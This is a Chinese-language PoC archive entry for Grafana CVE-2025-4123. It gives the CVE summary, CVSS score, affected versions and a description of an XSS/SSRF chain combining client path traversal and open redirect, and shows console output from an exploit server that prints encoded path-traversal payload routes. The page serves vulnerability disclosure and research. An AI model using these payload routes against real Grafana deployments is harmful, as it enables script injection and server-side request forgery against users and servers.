关联漏洞
标题:
Grafana 安全漏洞
(CVE-2025-4123)
描述:Grafana是Grafana开源的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana存在安全漏洞,该漏洞源于客户端路径遍历和开放重定向结合,可能导致跨站脚本攻击。
描述
CVE-2025-4123
介绍
# Blackash-CVE-2025-4123
CVE-2025-4123
CVE ID: "CVE-2025-4123"
Severity: High
Base Score: 7.6 HIGH 🔴
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
Impact: Server-Side Request Forgery (SSRF), Cross-Site Scripting
Affected Versions: Grafana 11.2, Grafana 11.3, Grafana 11.4, Grafana 11.5, Grafana 11.6, Grafana 12.0
# Description
A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client path traversal and open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions and if anonymous access is enabled, the XSS will work. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS though the `connect-src` directive.
```
❯ sudo python server.py --host http://127.0.0.1
[+] Using attacker host: http://127.0.0.1
[+] XSS Route: /a/..%2f..%2f..%2fpublic%2f..%252f%255C127.0.0.1%252f%253Fp%252f..%252f..%23/explore
[+] SSRF Route: /render/public/..%252f%5Chttp://127.0.0.1%252f%3F%252f..%252f..
* Serving Flask app 'server'
* Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:80
* Running on http://192.168.100.2:80
Press CTRL+C to quit
```
文件快照
[4.0K] /data/pocs/26e837a2b47cfd27c15c310ada91e547207a81c2
├── [2.6K] CVE-2025-4123.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。